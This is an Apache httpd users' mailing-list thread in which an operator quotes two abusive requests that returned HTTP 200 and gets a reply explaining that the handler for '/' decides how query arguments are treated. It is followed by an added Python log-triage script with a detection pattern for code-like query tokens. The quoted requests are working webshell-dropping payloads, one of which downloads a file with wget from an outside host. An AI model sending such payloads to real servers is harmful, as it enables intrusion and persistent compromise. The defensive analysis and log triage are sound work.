httpd-users mailing list archives

From William A Rowe Jr <wr...@rowe-clan.net>
Subject Re: [users@httpd] Strange responses
Date Sun, 07 Apr 2019 21:16:02 GMT
The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'?
Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?'
query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto <kohmoto@iris.eonet.ne.jp> wrote:

> Hi,
>
> I operate my site with httpd 2.4.39 with ssl option.
>
> Yesterday, strange responses were observed.
>
> My site received the following abuse requests.  Except the following
> requests, the httpd returns 404 error to obvious abuse requests. However,
> as to the following two queries, the httpd seemed to return a message
> when it receives 'GET /' with 200 status.  I expect the httpd should
> return 404 error.
>
> Case 1:
> GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>
> HTTP/1.1
>
> Case 2:
> POST
>
> /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%
> 2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
> HTTP/1.1
>
> It would be very appreciated if someone could advise me.
>
> Thank you.
>
> Yours truly,
>
> Kazuhiko Kohmoto
>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
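
An added example, not part of the original thread: a log triage sketch showing that the path httpd resolves for such requests is just '/', with everything after '?' left to the handler, and listing which 2xx responses carried code-like query arguments so the handler for that path can be checked. It assumes Combined Log Format; the token list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Tokens that do not belong in a query string sent to '/'.
# Assumed list for this example; tune it to your own site.
SUSPICIOUS = re.compile(
    r"(eval\s*\(|base64_decode\s*\(|file_put_contents\s*\(|passthru|#post_render|<\?php)",
    re.IGNORECASE,
)

# Combined Log Format prefix: host ident user [time] "METHOD target PROTO" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)" (\d{3})')

# Constructed sample lines (documentation addresses, shortened arguments).
SAMPLE = [
    '203.0.113.5 - - [05/Apr/2019:10:00:00 +0900] "GET /?1=%40eval%28base64_decode%28%27AAAA%27%29%29%3B HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Apr/2019:10:00:05 +0900] "POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Apr/2019:10:01:00 +0900] "GET /index.html?lang=en HTTP/1.1" 200 1024',
    '198.51.100.8 - - [05/Apr/2019:10:02:00 +0900] "GET /wp-login.php HTTP/1.1" 404 196',
]

def triage(line):
    """Split one access-log line into path, status and suspicious query tokens."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, method, target, _proto, status = m.groups()
    parts = urlsplit(target)  # path and query are separate components
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes
    hits = sorted({h.group(0).lower()
                   for k, v in pairs
                   for h in SUSPICIOUS.finditer(k + "=" + v)})
    return {"client": client, "method": method, "path": parts.path,
            "status": int(status), "hits": hits}

def served_probes(lines):
    """Requests answered 2xx whose query carried code-like tokens.

    A 2xx here only means the path exists; whether the arguments did anything
    depends on the handler mapped to that path (static file vs. script).
    """
    parsed = [r for r in map(triage, lines) if r]
    return [r for r in parsed if r["hits"] and 200 <= r["status"] < 300]

if __name__ == "__main__":
    for r in served_probes(SAMPLE):
        print(r["client"], r["method"], r["path"], r["status"], r["hits"])
```
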
